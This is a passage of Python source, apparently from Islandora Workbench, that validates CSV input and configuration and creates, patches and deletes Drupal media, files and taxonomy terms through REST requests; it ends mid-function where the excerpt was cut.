                    if len(parent_nid) > 0:
                        parent_node_exists = ping_node(config, parent_nid)
                        if parent_node_exists is False:
                            message = "The 'field_member_of' field in row " + \
                                str(count) + " of your CSV file contains a node ID (" + parent_nid + ") that doesn't exist."
                            logging.error(message)
                            sys.exit('Error: ' + message)
        # Validate 'langcode' values if that field exists in the CSV.
        if langcode_was_present:
            validate_langcode_csv_data = get_csv_data(config)
            for count, row in enumerate(validate_langcode_csv_data, start=1):
                langcode_valid = validate_language_code(row['langcode'])
                if not langcode_valid:
                    message = "Row " + \
                        str(count) + " of your CSV file contains an invalid Drupal language code (" + row['langcode'] + ") in its 'langcode' column."
                    logging.error(message)
                    sys.exit('Error: ' + message)
    if config['task'] == 'delete':
        if 'node_id' not in csv_column_headers:
            message = 'For "delete" tasks, your CSV file must contain a "node_id" column.'
            logging.error(message)
            sys.exit('Error: ' + message)
    if config['task'] == 'add_media':
        if 'node_id' not in csv_column_headers:
            message = 'For "add_media" tasks, your CSV file must contain a "node_id" column.'
            logging.error(message)
            sys.exit('Error: ' + message)
        if 'file' not in csv_column_headers:
            message = 'For "add_media" tasks, your CSV file must contain a "file" column.'
            logging.error(message)
            sys.exit('Error: ' + message)
    if config['task'] == 'delete_media':
        if 'media_id' not in csv_column_headers:
            message = 'For "delete_media" tasks, your CSV file must contain a "media_id" column.'
            logging.error(message)
            sys.exit('Error: ' + message)
    # Check for existence of files listed in the 'file' column.
    if (config['task'] == 'create' or config['task'] == 'add_media') and config['paged_content_from_directories'] is False:
        file_check_csv_data = get_csv_data(config)
        if config['nodes_only'] is False and config['allow_missing_files'] is False:
            for count, file_check_row in enumerate(file_check_csv_data, start=1):
                if len(file_check_row['file']) == 0:
                    message = 'Row ' + file_check_row[config['id_field']] + ' contains an empty "file" value.'
                    logging.error(message)
                    sys.exit('Error: ' + message)
                file_check_row['file'] = file_check_row['file'].strip()
                if file_check_row['file'].startswith('http'):
                    http_response_code = ping_remote_file(file_check_row['file'])
                    # ping_remote_file() returns an HTTP status code (or exits),
                    # so a single call and comparison suffices; the previous
                    # 'is False' re-ping issued a redundant second request.
                    if http_response_code != 200:
                        message = 'Remote file ' + file_check_row['file'] + ' identified in CSV "file" column for record with ID field value ' \
                            + file_check_row[config['id_field']] + ' not found or not accessible (HTTP response code ' + str(http_response_code) + ').'
                        logging.error(message)
                        sys.exit('Error: ' + message)
                if os.path.isabs(file_check_row['file']):
                    file_path = file_check_row['file']
                else:
                    file_path = os.path.join(config['input_dir'], file_check_row['file'])
                if not file_check_row['file'].startswith('http'):
                    if not os.path.exists(file_path) or not os.path.isfile(file_path):
                        message = 'File ' + file_path + ' identified in CSV "file" column for record with ID field value ' \
                            + file_check_row[config['id_field']] + ' not found.'
                        logging.error(message)
                        sys.exit('Error: ' + message)
            message = 'OK, files named in the CSV "file" column are all present.'
            print(message)
            logging.info(message)
        empty_file_values_exist = False
        if config['nodes_only'] is False and config['allow_missing_files'] is True:
            for count, file_check_row in enumerate(
                    file_check_csv_data, start=1):
                if len(file_check_row['file']) == 0:
                    empty_file_values_exist = True
                else:
                    file_path = os.path.join(
                        config['input_dir'], file_check_row['file'])
                    if not os.path.exists(
                            file_path) or not os.path.isfile(file_path):
                        message = 'File ' + file_path + ' identified in CSV "file" column not found.'
                        logging.error(message)
                        sys.exit('Error: ' + message)
            if empty_file_values_exist is True:
                message = 'OK, files named in the CSV "file" column are all present; the "allow_missing_files" option is enabled and empty "file" values exist.'
                print(message)
                logging.info(message)
            else:
                message = 'OK, files named in the CSV "file" column are all present.'
                print(message)
                logging.info(message)
        # @todo: check that each file's extension is allowed for the current media type usin get_registered_media_extensions().
        # See https://github.com/mjordan/islandora_workbench/issues/126. Maybe also compare allowed extensions with those in
        # 'media_type[s]' config option?
    if config['task'] == 'create' and config['paged_content_from_directories'] is True:
        if 'paged_content_page_model_tid' not in config:
            message = 'If you are creating paged content, you must include "paged_content_page_model_tid" in your configuration.'
            logging.error(
                'Configuration requires "paged_content_page_model_tid" setting when creating paged content.')
            sys.exit('Error: ' + message)
        paged_content_from_directories_csv_data = get_csv_data(config)
        for count, file_check_row in enumerate(
                paged_content_from_directories_csv_data, start=1):
            dir_path = os.path.join(
                config['input_dir'], file_check_row[config['id_field']])
            if not os.path.exists(dir_path) or os.path.isfile(dir_path):
                # Fixed stray extra quotation mark in this message.
                message = 'Page directory ' + dir_path + ' for CSV record with ID "' \
                    + file_check_row[config['id_field']] + '" not found.'
                logging.error(message)
                sys.exit('Error: ' + message)
            page_files = os.listdir(dir_path)
            if len(page_files) == 0:
                print(
                    'Warning: Page directory ' +
                    dir_path +
                    ' is empty; is that intentional?')
                logging.warning('Page directory ' + dir_path + ' is empty.')
            for page_file_name in page_files:
                if config['paged_content_sequence_seprator'] not in page_file_name:
                    message = 'Page file ' + os.path.join(
                        dir_path,
                        page_file_name) + ' does not contain a sequence separator (' + config['paged_content_sequence_seprator'] + ').'
                    logging.error(message)
                    sys.exit('Error: ' + message)
        print('OK, page directories are all present.')
    # If nothing has failed by now, exit with a positive, upbeat message.
    print("Configuration and input data appear to be valid.")
    logging.info('Configuration checked for "%s" task using config file %s, no problems found.', config['task'], args.config)
    sys.exit(0)
def get_registered_media_extensions(field_definitions):
    """Dump each field definition to stdout.

    Unfinished. See https://github.com/mjordan/islandora_workbench/issues/126.
    """
    for field_name, field_def in field_definitions.items():
        print("Field name: " + field_name + ' / ' + str(field_def))
    # Sketch of the intended behavior, kept from the original draft:
    #     if field_def['entity_type'] == 'media':
    #         if 'file_extensions' in field_def:
    #             print('Allowed file extensions for ' + field_def['media_type'] + ' :' + field_def['file_extensions'])
    #         else:
    #             print("No file extensions for " + field_def['media_type'])
def check_input_for_create_from_files(config, args):
    """Validate the config file and input data if task is 'create_from_files'.

    Checks required configuration keys, the existence of the input
    directory, filename lengths (filenames become node titles), and the
    presence of a "model"/"models" option. Exits with an error message on
    the first problem, or with status 0 when everything validates.
    """
    if config['task'] != 'create_from_files':
        message = 'Your task must be "create_from_files".'
        logging.error(message)
        sys.exit('Error: ' + message)
    logging.info('Starting configuration check for "%s" task using config file %s.', config['task'], args.config)
    ping_islandora(config, print_message=False)
    config_keys = list(config.keys())
    unwanted_in_create_from_files = [
        'check',
        'delimiter',
        'subdelimiter',
        'allow_missing_files',
        'validate_title_length',
        'paged_content_from_directories',
        'delete_media_with_nodes',
        'allow_adding_terms']
    for option in unwanted_in_create_from_files:
        if option in config_keys:
            config_keys.remove(option)
    # Check for presence of required config keys.
    create_required_options = [
        'task',
        'host',
        'username',
        'password']
    for create_required_option in create_required_options:
        if create_required_option not in config_keys:
            # Fixed NameError: this message previously referenced the
            # undefined names 'joiner' and 'create_options'.
            message = 'Please check your config file for required values: ' \
                + ', '.join(create_required_options) + '.'
            logging.error(message)
            sys.exit('Error: ' + message)
    # Check existence of input directory.
    if os.path.exists(config['input_dir']):
        message = 'OK, input directory "' + config['input_dir'] + '" found.'
        print(message)
        logging.info(message)
    else:
        # Fixed stray extra quotation mark in this message.
        message = 'Input directory "' + config['input_dir'] + '" not found.'
        logging.error(message)
        sys.exit('Error: ' + message)
    # Validate length of 'title', which is derived from each filename.
    files = os.listdir(config['input_dir'])
    for file_name in files:
        filename_without_extension = os.path.splitext(file_name)[0]
        if len(filename_without_extension) > 255:
            message = 'The filename "' + filename_without_extension + \
                '" exceeds Drupal\'s maximum length of 255 characters and cannot be used for a node title.'
            logging.error(message)
            sys.exit('Error: ' + message)
    # Check that either 'model' or 'models' are present in the config file.
    if ('model' not in config and 'models' not in config):
        message = 'You must include either the "model" or "models" option in your configuration.'
        logging.error(message)
        sys.exit('Error: ' + message)
    # If nothing has failed by now, exit with a positive message.
    print("Configuration and input data appear to be valid.")
    logging.info(
        'Configuration checked for "%s" task using config file %s, no problems found.',
        config['task'],
        args.config)
    sys.exit(0)
def log_field_cardinality_violation(field_name, record_id, cardinality):
    """Record a warning in the log during create/update tasks when field values
    are sliced off. Workbench does this if the number of values in a field
    exceeds the field's cardinality. record_id could be a value from the
    configured id_field or a node ID.
    """
    message = (
        "Adding all values in CSV field %s for record %s would exceed maximum "
        "number of allowed values (%s), so only adding first value."
    )
    logging.warning(message, field_name, record_id, cardinality)
def validate_language_code(langcode):
    """Return True if langcode is one of Drupal's language codes, False otherwise."""
    # The set of language codes recognized by Drupal core.
    drupal_language_codes = {
        'af', 'am', 'ar', 'ast', 'az', 'be', 'bg', 'bn', 'bo', 'bs',
        'ca', 'cs', 'cy', 'da', 'de', 'dz', 'el', 'en', 'en-x-simple', 'eo',
        'es', 'et', 'eu', 'fa', 'fi', 'fil', 'fo', 'fr', 'fy', 'ga', 'gd', 'gl',
        'gsw-berne', 'gu', 'he', 'hi', 'hr', 'ht', 'hu', 'hy', 'id', 'is', 'it',
        'ja', 'jv', 'ka', 'kk', 'km', 'kn', 'ko', 'ku', 'ky', 'lo', 'lt', 'lv',
        'mg', 'mk', 'ml', 'mn', 'mr', 'ms', 'my', 'ne', 'nl', 'nb', 'nn', 'oc',
        'pa', 'pl', 'pt-pt', 'pt-br', 'ro', 'ru', 'sco', 'se', 'si', 'sk', 'sl',
        'sq', 'sr', 'sv', 'sw', 'ta', 'ta-lk', 'te', 'th', 'tr', 'tyv', 'ug',
        'uk', 'ur', 'vi', 'xx-lolspeak', 'zh-hans', 'zh-hant'}
    return langcode in drupal_language_codes
def clean_csv_values(row):
    """Strip leading and trailing whitespace from every string value in the
    CSV row (in place) and return the row. Could be extended in the future
    for other normalization tasks.
    """
    for key, value in row.items():
        if isinstance(value, str):
            row[key] = value.strip()
    return row
def truncate_csv_value(field_name, record_id, field_config, value):
    """Truncate a field subvalue to the field's configured maximum length.

    Drupal will not accept field values whose length exceeds the configured
    maximum length for that field. 'value' here is a field subvalue. Non-string
    values, fields without a 'max_length', and values within the limit are
    returned unchanged; truncations are logged as warnings.
    """
    if not isinstance(value, str) or 'max_length' not in field_config:
        return value
    max_length = field_config['max_length']
    if max_length is None or len(value) <= int(max_length):
        return value
    truncated = value[:max_length]
    logging.warning(
        'CSV field value "%s" in field "%s" (record ID %s) truncated at %s characters as required by the field\'s configuration.',
        value,
        field_name,
        record_id,
        max_length)
    return truncated
def get_node_field_values(config, nid):
    """Fetch a node's JSON representation so its existing field data can be
    used during PATCH updates, which replace a field's values wholesale.
    """
    node_url = '{}/node/{}?_format=json'.format(config['host'], nid)
    response = issue_request(config, 'GET', node_url)
    return json.loads(response.text)
def get_target_ids(node_field_values):
    """Return the 'target_id' of every entity referenced in a field's values."""
    return [value['target_id'] for value in node_field_values]
def split_typed_relation_string(config, typed_relation_string, target_type):
    """Parse a 'typed_relation' CSV value into a list of field-value dicts.

    Fields of type 'typed_relation' are represented in the CSV file using a
    structured string, specifically namespace:property:id, e.g.
    'relators:pht:5'. 'id' is either a term ID or a node ID. The string may
    contain multiple values separated by the configured subdelimiter.

    The term ID segment may itself carry an optional vocabulary-ID namespace,
    e.g. 'relators:pht:person:Jordan, Mark'. Because we split on only the
    first two ':' characters, anything after the second colon is passed
    through untouched as the target.
    """
    return_list = []
    for chunk in typed_relation_string.split(config['subdelimiter']):
        namespace, rel_property, target = chunk.split(':', 2)
        # Numeric targets become ints (term/node IDs); everything else is
        # kept as a string for later resolution.
        if value_is_numeric(target):
            target = int(target)
        return_list.append({
            'target_id': target,
            'rel_type': namespace + ':' + rel_property,
            'target_type': target_type,
        })
    return return_list
def split_geolocation_string(config, geolocation_string):
    """Parse a 'geolocation' CSV value into a list of {'lat': ..., 'lng': ...}
    dicts as required by the 'geolocation' field type.

    Values are structured strings of the form "lat,lng", e.g.
    "49.16667, -123.93333" or "+49.16667, -123.93333", optionally joined by
    the configured multivalue subdelimiter.
    """
    return_list = []
    for pair in geolocation_string.split(config['subdelimiter']):
        parts = pair.split(',')
        # A leading backslash may be present when the value comes from a
        # spreadsheet export; strip it before trimming whitespace.
        return_list.append({
            'lat': parts[0].lstrip('\\').strip(),
            'lng': parts[1].lstrip('\\').strip(),
        })
    return return_list
def split_link_string(config, link_string):
    """Parse a 'link' CSV value into a list of {'uri': ..., 'title': ...}
    dicts as required by the 'link' field type.

    Fields of type 'link' are represented in the CSV file using a structured
    string, specifically uri%%title, e.g.
    "https://www.lib.sfu.ca%%SFU Library Website", optionally joined by the
    configured multivalue subdelimiter.

    If a value contains no '%%title' segment, the URI itself is used as the
    title (previously this raised an IndexError).
    """
    return_list = []
    temp_list = link_string.split(config['subdelimiter'])
    for item in temp_list:
        if '%%' in item:
            item_list = item.split('%%')
            item_dict = {'uri': item_list[0].strip(), 'title': item_list[1].strip()}
        else:
            # No title supplied; fall back to the URI so Drupal still gets a
            # non-empty title value.
            uri = item.strip()
            item_dict = {'uri': uri, 'title': uri}
        return_list.append(item_dict)
    return return_list
def validate_media_use_tid(config):
    """Validate whether the term ID or URI provided in the config value for media_use_tid is
    in the Islandora Media Use vocabulary.

    Exits (via sys.exit) with a logged error message when validation fails;
    returns None otherwise.
    """
    if value_is_numeric(config['media_use_tid']) is not True and config['media_use_tid'].startswith('http'):
        # The configured value is a Linked Data URI; resolve it to a term ID.
        # NOTE(review): when the URI does resolve, the resulting term's
        # vocabulary is not checked against 'islandora_media_use' here —
        # confirm whether that is intentional.
        media_use_tid = get_term_id_from_uri(config, config['media_use_tid'])
        if media_use_tid is False:
            message = 'URI "' + \
                config['media_use_tid'] + '" provided in configuration option "media_use_tid" does not match any taxonomy terms.'
            logging.error(message)
            sys.exit('Error: ' + message)
    else:
        # Confirm the tid exists and is in the islandora_media_use vocabulary
        term_endpoint = config['host'] + '/taxonomy/term/' \
            + str(config['media_use_tid']) + '?_format=json'
        headers = {'Content-Type': 'application/json'}
        response = issue_request(config, 'GET', term_endpoint, headers)
        if response.status_code == 404:
            message = 'Term ID "' + \
                str(config['media_use_tid']) + '" used in the "media_use_tid" configuration option is not a term ID (term doesn\'t exist).'
            logging.error(message)
            sys.exit('Error: ' + message)
        if response.status_code == 200:
            response_body = json.loads(response.text)
            # Only terms that carry a 'vid' (vocabulary reference) can be
            # checked for vocabulary membership.
            if 'vid' in response_body:
                if response_body['vid'][0]['target_id'] != 'islandora_media_use':
                    message = 'Term ID "' + \
                        str(config['media_use_tid']) + '" provided in configuration option "media_use_tid" is not in the Islandora Media Use vocabulary.'
                    logging.error(message)
                    sys.exit('Error: ' + message)
def preprocess_field_data(subdelimiter, field_value, path_to_script):
    """Run a field preprocessor script and return its output and exit status code.

    The script is passed the field subdelimiter as defined in the config YAML
    and the field's value, and prints a modified version of the value back to
    this function on STDOUT.
    """
    proc = subprocess.Popen(
        [path_to_script, subdelimiter, field_value],
        stdout=subprocess.PIPE)
    output, _ = proc.communicate()
    return output, proc.returncode
def execute_bootstrap_script(path_to_script, path_to_config_file):
    """Run a bootstrap script, passing it the path to the config file, and
    return its output and exit status code.
    @todo: pass config into script.
    """
    proc = subprocess.Popen(
        [path_to_script, path_to_config_file],
        stdout=subprocess.PIPE)
    output, _ = proc.communicate()
    return output, proc.returncode
def create_media(config, filename, node_uri, node_csv_row):
    """Create a media entity for 'filename' and attach it to the node at node_uri.

    node_csv_row is an OrderedDict, e.g.
    OrderedDict([('file', 'IMG_5083.JPG'), ('id', '05'), ('title', 'Alcatraz Island').

    Returns the HTTP status code of the media-creation PUT request, or None
    when config['nodes_only'] is True (no media is created in that case).
    """
    if config['nodes_only'] is True:
        return
    is_remote = False
    filename = filename.strip()
    # Remote files are downloaded into the input directory first; local
    # filenames may be absolute or relative to the input directory.
    if filename.startswith('http'):
        file_path = download_remote_file(config, filename, node_csv_row)
        filename = file_path.split("/")[-1]
        is_remote = True
    elif os.path.isabs(filename):
        file_path = filename
    else:
        file_path = os.path.join(config['input_dir'], filename)
    # mimetype is a (type, encoding) tuple; only the type is used below.
    mimetype = mimetypes.guess_type(file_path)
    media_type = set_media_type(filename, config)
    # Resolve the configured media use term to a numeric term ID.
    # NOTE(review): if config['media_use_tid'] is neither numeric nor an
    # 'http' URI, media_use_tid is never assigned and the line below raises
    # NameError — presumably validate_media_use_tid() guarantees one of the
    # two forms; confirm.
    if value_is_numeric(config['media_use_tid']):
        media_use_tid = config['media_use_tid']
    if not value_is_numeric(config['media_use_tid']) and config['media_use_tid'].startswith('http'):
        media_use_tid = get_term_id_from_uri(config, config['media_use_tid'])
    media_endpoint_path = '/media/' + media_type + '/' + str(media_use_tid)
    media_endpoint = node_uri + media_endpoint_path
    location = config['drupal_filesystem'] + os.path.basename(filename)
    media_headers = {
        'Content-Type': mimetype[0],
        'Content-Location': location
    }
    binary_data = open(file_path, 'rb')
    media_response = issue_request(config, 'PUT', media_endpoint, media_headers, '', binary_data)
    # Clean up the temporary download folder for remote files if configured.
    if is_remote and config['delete_tmp_upload'] is True:
        containing_folder = os.path.join(config['input_dir'], re.sub('[^A-Za-z0-9]+', '_', node_csv_row[config['id_field']]))
        shutil.rmtree(containing_folder)
    if media_response.status_code == 201:
        if 'location' in media_response.headers:
            # A 201 response provides a 'location' header, but a '204' response does not.
            media_uri = media_response.headers['location']
            logging.info(
                "Media (%s) created at %s, linked to node %s.",
                media_type,
                media_uri,
                node_uri)
            media_id = media_uri.rsplit('/', 1)[-1]
            # Copy base fields (created, uid) from the parent node's CSV row.
            patch_media_fields(config, media_id, media_type, node_csv_row)
            if media_type == 'image':
                patch_image_alt_text(config, media_id, node_csv_row)
    elif media_response.status_code == 204:
        logging.warning(
            "Media created and linked to node %s, but its URI is not available since its creation returned an HTTP status code of %s",
            node_uri,
            media_response.status_code)
        logging.warning(
            "Media linked to node %s base fields not updated.",
            node_uri)
    else:
        logging.error(
            'Media not created, PUT request to "%s" returned an HTTP status code of "%s".',
            media_endpoint,
            media_response.status_code)
    binary_data.close()
    return media_response.status_code
def patch_media_fields(config, media_id, media_type, node_csv_row):
    """Patch the media entity so its 'created' and 'uid' base fields match
    the parent node's CSV record. Does nothing when the CSV row provides
    neither value.
    """
    media_json = {
        'bundle': [
            {'target_id': media_type}
        ]
    }
    created_value = node_csv_row.get('created', '')
    if len(created_value) > 0:
        media_json['created'] = [{'value': created_value}]
    uid_value = node_csv_row.get('uid', '')
    if len(uid_value) > 0:
        media_json['uid'] = [{'target_id': uid_value}]
    # Only issue a PATCH when at least one base field was added above.
    if len(media_json) == 1:
        return
    endpoint = config['host'] + '/media/' + media_id + '?_format=json'
    headers = {'Content-Type': 'application/json'}
    response = issue_request(config, 'PATCH', endpoint, headers, media_json)
    if response.status_code == 200:
        logging.info(
            "Media %s fields updated to match parent node's.", config['host'] + '/media/' + media_id)
    else:
        logging.warning(
            "Media %s fields not updated to match parent node's.", config['host'] + '/media/' + media_id)
def patch_image_alt_text(config, media_id, node_csv_row):
    """Patch the alt text value for an image media. Use the parent node's title
    unless the CSV record contains an image_alt_text field with something in it.
    """
    get_endpoint = config['host'] + '/media/' + media_id + '?_format=json'
    get_headers = {'Content-Type': 'application/json'}
    get_response = issue_request(config, 'GET', get_endpoint, get_headers)
    get_response_body = json.loads(get_response.text)
    # The PATCH below must re-send the existing image file's target_id.
    field_media_image_target_id = get_response_body['field_media_image'][0]['target_id']
    # 'image_alt_text' wins over 'title' regardless of column order because
    # the title assignment is unconditional and the alt-text assignment only
    # overwrites it when the CSV provides a non-empty value.
    # NOTE(review): if the CSV row has no 'title' column and no non-empty
    # 'image_alt_text', alt_text is never assigned and the dict below raises
    # NameError — presumably 'title' is always present; confirm.
    for field_name, field_value in node_csv_row.items():
        if field_name == 'title':
            # Strip out HTML markup to guard against CSRF in alt text.
            alt_text = re.sub('<[^<]+?>', '', field_value)
        if field_name == 'image_alt_text' and len(field_value) > 0:
            alt_text = re.sub('<[^<]+?>', '', field_value)
    media_json = {
        'bundle': [
            {'target_id': 'image'}
        ],
        'field_media_image': [
            {"target_id": field_media_image_target_id, "alt": alt_text}
        ],
    }
    patch_endpoint = config['host'] + '/media/' + media_id + '?_format=json'
    patch_headers = {'Content-Type': 'application/json'}
    patch_response = issue_request(
        config,
        'PATCH',
        patch_endpoint,
        patch_headers,
        media_json)
    if patch_response.status_code != 200:
        logging.warning(
            "Alt text for image media %s not updated.",
            config['host'] + '/media/' + media_id)
def remove_media_and_file(config, media_id):
    """Delete a media and the file associated with it.

    The file is deleted first; the media entity is deleted only if the file
    deletion succeeds. Returns the media DELETE status code (204) on full
    success, False otherwise.
    """
    # First get the media JSON.
    get_media_url = '/media/' + str(media_id) + '?_format=json'
    get_media_response = issue_request(config, 'GET', get_media_url)
    get_media_response_body = json.loads(get_media_response.text)
    # These are the Drupal field names on the various types of media.
    file_fields = [
        'field_media_file',
        'field_media_image',
        'field_media_document',
        'field_media_audio_file',
        'field_media_video_file']
    # NOTE(review): if the media carries none of the fields above, file_id
    # is never assigned and the endpoint construction below raises NameError
    # — confirm whether all deletable media are guaranteed to have one.
    for file_field_name in file_fields:
        if file_field_name in get_media_response_body:
            file_id = get_media_response_body[file_field_name][0]['target_id']
            break
    # Delete the file first.
    file_endpoint = config['host'] + '/entity/file/' + str(file_id) + '?_format=json'
    file_response = issue_request(config, 'DELETE', file_endpoint)
    if file_response.status_code == 204:
        logging.info("File %s (from media %s) deleted.", file_id, media_id)
    else:
        logging.error(
            "File %s (from media %s) not deleted (HTTP response code %s).",
            file_id,
            media_id,
            file_response.status_code)
    # Then the media.
    if file_response.status_code == 204:
        media_endpoint = config['host'] + '/media/' + str(media_id) + '?_format=json'
        media_response = issue_request(config, 'DELETE', media_endpoint)
        if media_response.status_code == 204:
            logging.info("Media %s deleted.", media_id)
            return media_response.status_code
        else:
            logging.error(
                "Media %s not deleted (HTTP response code %s).",
                media_id,
                media_response.status_code)
            return False
    return False
# @lru_cache(maxsize=None)
def get_csv_data(config):
    """Read the input CSV data and prepare it for use in create, update, etc. tasks.

    This function reads the source CSV file (or the CSV dump from Google Sheets or Excel),
    applies some prepocessing to each CSV record (specifically, it adds any CSV field
    templates that are registered in the config file, and it filters out any CSV
    records or lines in the CSV file that begine with a #), and finally, writes out
    a version of the CSV data to a file that appends .prepocessed to the input
    CSV file name. It is this .prepocessed file that is used in create, update, etc.
    tasks.

    Returns a csv.DictReader over the preprocessed file.
    """
    # Resolve the effective CSV path: absolute paths are used as-is; Google
    # Sheets and Excel inputs have already been dumped to well-known
    # filenames inside the input directory.
    if os.path.isabs(config['input_csv']):
        input_csv_path = config['input_csv']
    elif config['input_csv'].startswith('http') is True:
        input_csv_path = os.path.join(config['input_dir'], config['google_sheets_csv_filename'])
    elif config['input_csv'].endswith('.xlsx') is True:
        input_csv_path = os.path.join(config['input_dir'], config['excel_csv_filename'])
    else:
        input_csv_path = os.path.join(config['input_dir'], config['input_csv'])
    if not os.path.exists(input_csv_path):
        message = 'Error: CSV file ' + input_csv_path + ' not found.'
        logging.error(message)
        sys.exit(message)
    try:
        csv_reader_file_handle = open(input_csv_path, 'r', encoding="utf-8", newline='')
    except (UnicodeDecodeError):
        message = 'Error: CSV file ' + input_csv_path + ' must be encoded in ASCII or UTF-8.'
        logging.error(message)
        sys.exit(message)
    # '.prepocessed' (sic) is the established suffix used elsewhere; do not
    # "fix" the spelling without updating all other uses.
    csv_writer_file_handle = open(input_csv_path + '.prepocessed', 'w+', newline='')
    csv_reader = csv.DictReader(csv_reader_file_handle, delimiter=config['delimiter'])
    csv_reader_fieldnames = csv_reader.fieldnames
    tasks = ['create', 'update']
    if config['task'] in tasks and 'csv_field_templates' in config and len(config['csv_field_templates']) > 0:
        # If the config file contains CSV field templates, append them to the CSV data.
        # Make a copy of the column headers so we can skip adding templates to the new CSV
        # if they're present in the source CSV. We don't want fields in the source CSV to be
        # stomped on by templates.
        csv_reader_fieldnames_orig = copy.copy(csv_reader_fieldnames)
        for template in config['csv_field_templates']:
            for field_name, field_value in template.items():
                if field_name not in csv_reader_fieldnames_orig:
                    csv_reader_fieldnames.append(field_name)
        csv_writer = csv.DictWriter(csv_writer_file_handle, fieldnames=csv_reader_fieldnames)
        csv_writer.writeheader()
        row_num = 0
        unique_identifiers = []
        for row in csv_reader:
            row_num += 1
            # Inject template values into each row for columns the source
            # CSV does not already provide.
            for template in config['csv_field_templates']:
                for field_name, field_value in template.items():
                    if field_name not in csv_reader_fieldnames_orig:
                        row[field_name] = field_value
            # Skip CSV records whose first column begin with #.
            if not list(row.values())[0].startswith('#'):
                try:
                    unique_identifiers.append(row[config['id_field']])
                    csv_writer.writerow(row)
                except (ValueError):
                    # DictWriter raises ValueError for rows with extra keys.
                    message = "Error: Row " + str(row_num) + ' in your CSV file ' + \
                        "has more columns (" + str(len(row)) + ") than there are headers (" + \
                        str(len(csv_reader.fieldnames)) + ').'
                    logging.error(message)
                    sys.exit(message)
        # Duplicate ID values would make later row-to-node mapping ambiguous.
        repeats = set(([x for x in unique_identifiers if unique_identifiers.count(x) > 1]))
        if len(repeats) > 0:
            message = "duplicated identifiers found: " + str(repeats)
            logging.error(message)
            sys.exit(message)
    else:
        # No templates apply; copy rows through (minus commented-out ones).
        csv_writer = csv.DictWriter(csv_writer_file_handle, fieldnames=csv_reader_fieldnames)
        csv_writer.writeheader()
        row_num = 0
        for row in csv_reader:
            row_num += 1
            # Skip CSV records whose first column begin with #.
            if not list(row.values())[0].startswith('#'):
                try:
                    csv_writer.writerow(row)
                except (ValueError):
                    message = "Error: Row " + str(row_num) + ' in your CSV file ' + \
                        "has more columns (" + str(len(row)) + ") than there are headers (" + \
                        str(len(csv_reader.fieldnames)) + ').'
                    logging.error(message)
                    sys.exit(message)
    csv_writer_file_handle.close()
    preprocessed_csv_reader_file_handle = open(input_csv_path + '.prepocessed', 'r')
    preprocessed_csv_reader = csv.DictReader(preprocessed_csv_reader_file_handle, delimiter=config['delimiter'])
    return preprocessed_csv_reader
def get_term_pairs(config, vocab_id):
    """Return a dict mapping term IDs to term names for every term in a
    vocabulary. If the vocabulary does not exist, or is not registered with
    the view, the request to Drupal returns a 200 plus an empty JSON list,
    i.e., [], which yields an empty dict here.

    Note: this URL requires the view "Terms in vocabulary", created by the
    Islandora Workbench Integation module, to present on the target
    Islandora.
    """
    vocab_url = config['host'] + '/vocabulary/' + vocab_id + '?_format=json'
    response = issue_request(config, 'GET', vocab_url)
    vocab = json.loads(response.text)
    return {
        term['tid'][0]['value']: term['name'][0]['value']
        for term in vocab
    }
def find_term_in_vocab(config, vocab_id, term_name_to_find):
    """Look for term_name_to_find among all term names in vocab_id.
    Returns the matching term ID if found, False otherwise.
    """
    for tid, existing_name in get_term_pairs(config, vocab_id).items():
        if compare_strings(existing_name, term_name_to_find):
            return tid
    # None matched.
    return False
def get_term_id_from_uri(config, uri):
    """For a given URI, query the Term from URI View created by the Islandora
    Workbench Integration module. Because we don't know which field each
    taxonomy uses to store URIs (it's either field_external_uri or field_authority_link),
    we need to check both options in the "Term from URI" View.

    Returns the matching term ID, or False if no term matches the URI or
    if the request fails.
    """
    # Some vocabuluaries use this View.
    terms_with_uri = []
    # '#' must be percent-encoded or it is treated as a URL fragment.
    term_from_uri_url = config['host'] \
        + '/term_from_uri?_format=json&uri=' + uri.replace('#', '%23')
    term_from_uri_response = issue_request(config, 'GET', term_from_uri_url)
    if term_from_uri_response.status_code == 200:
        term_from_uri_response_body_json = term_from_uri_response.text
        term_from_uri_response_body = json.loads(
            term_from_uri_response_body_json)
        if len(term_from_uri_response_body) == 1:
            tid = term_from_uri_response_body[0]['tid'][0]['value']
            return tid
        if len(term_from_uri_response_body) > 1:
            # Ambiguous URI: collect all matches for the log message, then
            # fall back to the first term returned.
            for term in term_from_uri_response_body:
                terms_with_uri.append(
                    {term['tid'][0]['value']: term['vid'][0]['target_id']})
                tid = term_from_uri_response_body[0]['tid'][0]['value']
            print("Warning: See log for important message about use of term URIs.")
            logging.warning(
                'Term URI "%s" is used for more than one term (with these term ID/vocabulary ID combinations: ' +
                str(terms_with_uri) +
                '). Workbench is choosing the first term ID (%s)).',
                uri,
                tid)
            return tid
    # And some vocabuluaries use this View.
    term_from_authority_link_url = config['host'] + \
        '/term_from_authority_link?_format=json&authority_link=' + uri.replace('#', '%23')
    term_from_authority_link_response = issue_request(
        config, 'GET', term_from_authority_link_url)
    if term_from_authority_link_response.status_code == 200:
        term_from_authority_link_response_body_json = term_from_authority_link_response.text
        term_from_authority_link_response_body = json.loads(
            term_from_authority_link_response_body_json)
        if len(term_from_authority_link_response_body) == 1:
            tid = term_from_authority_link_response_body[0]['tid'][0]['value']
            return tid
        elif len(term_from_authority_link_response_body) > 1:
            # Same ambiguity handling as above: log all matches, use first.
            for term in term_from_authority_link_response_body:
                terms_with_uri.append(
                    {term['tid'][0]['value']: term['vid'][0]['target_id']})
                tid = term_from_authority_link_response_body[0]['tid'][0]['value']
            print("Warning: See log for important message about use of term URIs.")
            logging.warning(
                'Term URI "%s" is used for more than one term (with these term ID/vocabulary ID combinations: ' +
                str(terms_with_uri) +
                '). Workbench is choosing the first term ID (%s)).',
                uri,
                tid)
            return tid
        else:
            # URI does not match any term.
            return False
    # Non-200 response code.
    return False
def create_term(config, vocab_id, term_name):
    """Add a term to the target vocabulary.

    Returns the term ID of the newly created (or already existing) term,
    or False if the term could not be created (creation is disallowed by
    configuration, or the POST request failed).

    Fixes two log-message defects: a missing space before "provided", and
    the typo "trucated".
    """
    # Check to see if term exists; if so, return its ID, if not, proceed to
    # create it.
    tid = find_term_in_vocab(config, vocab_id, term_name)
    if value_is_numeric(tid):
        logging.info(
            'Term "%s" (term ID %s) already exists in vocabulary "%s".',
            term_name,
            tid,
            vocab_id)
        return tid
    if config['allow_adding_terms'] is False:
        logging.warning(
            'To create new taxonomy terms, you must add "allow_adding_terms: true" to your configuration file.')
        return False

    # Drupal term names are limited to 255 characters; truncate and log.
    if len(term_name) > 255:
        truncated_term_name = term_name[:255]
        message = 'Term "' + term_name + '" ' + \
